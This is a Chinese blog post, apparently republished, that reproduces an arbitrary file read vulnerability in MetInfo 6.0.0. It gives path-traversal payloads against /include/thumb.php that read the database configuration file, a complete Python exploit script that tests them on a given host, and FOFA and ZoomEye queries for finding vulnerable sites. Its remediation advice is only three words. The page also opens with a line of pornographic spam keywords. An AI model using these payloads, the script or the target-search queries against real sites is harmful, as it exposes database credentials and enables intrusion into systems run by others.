国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

  1. Toy模板網(wǎng)首頁
  2. >Toy博客

Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】

2年前作者:過期的秋刀魚-分類:Toy博客閱讀(21)違法舉報(bào)

這篇具有很好參考價(jià)值的文章主要介紹了Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

1.1、漏洞描述

漏洞名稱:MetInfo任意文件讀取

漏洞簡(jiǎn)介:MetInfo是一套使用PHP和MySQL開發(fā)的內(nèi)容管理系統(tǒng),其中的/app/system/include/module/old_thumb.class.php文件存在任意文件讀取漏洞,攻擊者可利用該漏洞讀取網(wǎng)站的敏感文件。

下載地址:歷史版本安裝文件下載 Ver_6.0.0

1.2、漏洞等級(jí)

高危

1.3、影響版本

Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】,# 滲透測(cè)試,網(wǎng)絡(luò)安全

影響版本:MetInfo 6.0.0

1.4、漏洞復(fù)現(xiàn)

代碼審計(jì)
defined('IN_MET') or exit('No permission');

load::sys_class('web');

class old_thumb extends web{

      public function doshow(){
        global $_M;

         $dir = str_replace(array('../','./'), '', $_GET['dir']);


        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

$dir = str_replace(array(‘…/’,‘./’), ‘’, $_GET[‘dir’]);

dir變量接受來自$_GET[‘dir’]傳遞進(jìn)來的值,用了str_replace函數(shù)做替換,將../,./替換成空值

readfile($dir);

漏洞點(diǎn)
/include/thumb.php

使用bp進(jìn)行抓包

Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】,# 滲透測(cè)試,網(wǎng)絡(luò)安全

測(cè)試一:

/include/thumb.php?dir=..././http/..././config/config_db.php

測(cè)試二:

/include/thumb.php?dir=.....///http/.....///config/config_db.php

測(cè)試三:

/include/thumb.php?dir=http/.....///.....///config/config_db.php

測(cè)試四:

/include/thumb.php?dir=http\..\..\config\config_db.php
    
   
# 此POC 僅適用于Windows 系統(tǒng),Linux 下無效  
#    只有windows以右斜杠作為文件路徑分隔符

Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】,# 滲透測(cè)試,網(wǎng)絡(luò)安全

1.5、深度利用

EXP編寫
import requests
import sys

banner = """
MetInfo 6.0.0
    ___________.__.__           __________                   .___
    \_   _____/|__|  |   ____   \______   \ ____ _____     __| _/
    |    __)  |  |  | _/ __ \   |       _// __ \\__  \   / __ | 
    |     \   |  |  |_\  ___/   |    |   \  ___/ / __ \_/ /_/ | 
    \___  /   |__|____/\___  >  |____|_  /\___  >____  /\____ | 
        \/                 \/          \/     \/     \/      \/ 
     
Usage: python3 *.py http://192.168.80.139/MetInfo6.0.0/
"""

headers = {
    "User-Agent":   "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"
}

dir_list = [
    "..././http/..././config/config_db.php",
    ".....///http/.....///config/config_db.php",
    "http/.....///.....///config/config_db.php",
    "http\..\..\config\config_db.php"
]

def attack(host):
    vul = "/include/thumb.php"
    url = host + vul

    res = requests.get(url = url, headers = headers)

    if res.status_code != 200:
        print(f"[INFO] {vul} is Not Exists!")
        exit()

    print(f"[INFO] {vul} is Exists!")

    for param in dir_list:
        params = {
            "dir":  param 
        }

        res = requests.get(url = url, params = params, headers = headers)

        print(f"[INFO] Test URL: {res.url}")

        if "<?php" in res.text:
            print("[RESULT] The target is vulnreable!")
            print(f"[RESULT]\n{res.text}")
            break

if len(sys.argv) < 2:
    print(banner)
    exit()

host = sys.argv[1]

attack(host = host)

Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】,# 滲透測(cè)試,網(wǎng)絡(luò)安全

1.6、漏洞挖掘

FOFA

app="metinfo"

ZoomEye文章來源地址http://www.zghlxwxcb.cn/news/detail-688732.html

app:"MetInfo"
app:"MetInfo"+os:"Windows"

1.7修復(fù)建議

  • 升級(jí)
  • 打補(bǔ)丁
  • 上設(shè)備

到了這里,關(guān)于Metinfo6.0.0任意文件讀取【漏洞復(fù)現(xiàn)】的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 任意文件讀取及漏洞復(fù)現(xiàn)

    任意文件讀取及漏洞復(fù)現(xiàn)

    一些網(wǎng)站的需求,可能會(huì)提供文件查看與下載的功能。如果對(duì)用戶查看或下載的文件沒有限制或者限制繞過,就可以查看或下載任意文件。這些文件可以是源代碼文件,配置文件,敏感文件等等。 任意文件讀取會(huì)造成(敏感)信息泄露: 任意文件讀取很多情況是由于其他漏

    2024年02月09日
    瀏覽(24)
  • 【漏洞復(fù)現(xiàn)】OfficeWeb365 Indexs 任意文件讀取漏洞

    【漏洞復(fù)現(xiàn)】OfficeWeb365 Indexs 任意文件讀取漏洞

    OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨(dú)特的加密方式對(duì)payload進(jìn)行加密,讀取任意文件,獲取服務(wù)器敏感信息,使系統(tǒng)處于極不安全的狀態(tài)。 FOFA:body=\\\"請(qǐng)輸入furl參數(shù)\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 讀取文件加密方式

    2024年02月02日
    瀏覽(40)
  • Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 任意文件讀取漏洞復(fù)現(xiàn)

    Jenkins CLI 是 Jenkins 內(nèi)置的命令行頁面。 Jenkins 受影響版本中使用 args4j 庫解析CLI命令參數(shù),該庫默認(rèn)將參數(shù)中 @ 字符后的文件路徑替換為文件內(nèi)容,未授權(quán)的攻擊者可利用該特性使用 Jenkins 控制器進(jìn)程的默認(rèn)字符編碼讀取 Jenkins 控制器文件系統(tǒng)上的任意文件(如加密密鑰的二進(jìn)

    2024年02月22日
    瀏覽(26)
  • OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 Indexs 任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。 OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨(dú)特

    2024年02月03日
    瀏覽(38)
  • 漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    漏洞復(fù)現(xiàn)-Yearning front 任意文件讀取漏洞(附漏洞檢測(cè)腳本)

    文章中涉及的漏洞均已修復(fù),敏感信息均已做打碼處理,文章僅做經(jīng)驗(yàn)分享用途,切勿當(dāng)真,未授權(quán)的攻擊屬于非法行為!文章中敏感信息均已做多層打馬處理。傳播、利用本文章所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),作者不為此承擔(dān)

    2024年01月18日
    瀏覽(32)
  • officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    officeWeb365 Indexs接口存在任意文件讀取漏洞復(fù)現(xiàn)

    OfficeWeb365 是專注于 Office 文檔在線預(yù)覽及PDF文檔在線預(yù)覽云服務(wù),包括 Microsoft Word 文檔在線預(yù)覽、Excel 表格在線預(yù)覽、Powerpoint 演示文檔在線預(yù)覽,WPS 文字處理、WPS 表格、WPS 演示及 Adobe PDF 文檔在線預(yù)覽。OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨(dú)特

    2024年02月20日
    瀏覽(28)
  • 用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    用友NC word.docx 任意文件讀取漏洞復(fù)現(xiàn)

    ?用友NC是一款企業(yè)級(jí)ERP軟件。作為一種信息化管理工具,用友NC提供了一系列業(yè)務(wù)管理模塊,包括財(cái)務(wù)會(huì)計(jì)、采購(gòu)管理、銷售管理、物料管理、生產(chǎn)計(jì)劃和人力資源管理等,幫助企業(yè)實(shí)現(xiàn)數(shù)字化轉(zhuǎn)型和高效管理。 用友NC 系統(tǒng)word.docx等接口存在任意文件讀取漏洞,未經(jīng)身份認(rèn)證

    2024年01月25日
    瀏覽(22)
  • 惠爾頓 網(wǎng)絡(luò)安全審計(jì)系統(tǒng) 任意文件讀取漏洞復(fù)現(xiàn)

    惠爾頓 網(wǎng)絡(luò)安全審計(jì)系統(tǒng) 任意文件讀取漏洞復(fù)現(xiàn)

    惠爾頓網(wǎng)絡(luò)安全審計(jì)產(chǎn)品致力于滿足軍工四證、軍工保密室建設(shè)、國(guó)家涉密網(wǎng)絡(luò)建設(shè)的審計(jì)要求,規(guī)范網(wǎng)絡(luò)行為,滿足國(guó)家的規(guī)范;支持1-3線路的internet接入、1-3對(duì)網(wǎng)橋;含強(qiáng)大的上網(wǎng)行為管理、審計(jì)、監(jiān)控模塊;用戶訪問功能,內(nèi)容過濾功能;流量控制功能、帶寬管理功能

    2024年02月22日
    瀏覽(28)
  • IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    IP-guard WebServer 任意文件讀取漏洞復(fù)現(xiàn)

    ?IP-guard是由溢信科技股份有限公司開發(fā)的一款終端安全管理軟件,旨在幫助企業(yè)保護(hù)終端設(shè)備安全、數(shù)據(jù)安全、管理網(wǎng)絡(luò)使用和簡(jiǎn)化IT系統(tǒng)管理。 由于IP-guard WebServer?/ipg/static/appr/lib/flexpaper/php/view.php接口處未對(duì)用戶輸入的數(shù)據(jù)進(jìn)行嚴(yán)格的校驗(yàn)和過濾。未經(jīng)身份驗(yàn)證的攻擊者可

    2024年04月12日
    瀏覽(19)

  • 【漏洞復(fù)現(xiàn)】泛微e-office OfficeServer2.php 存在任意文件讀取漏洞復(fù)現(xiàn)

    泛微e-office OfficeServer2.php 存在任意文件讀取漏洞,攻擊者可通過構(gòu)造特定Payload獲取敏感數(shù)據(jù)信息。 請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果

    2024年02月09日
    瀏覽(22)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包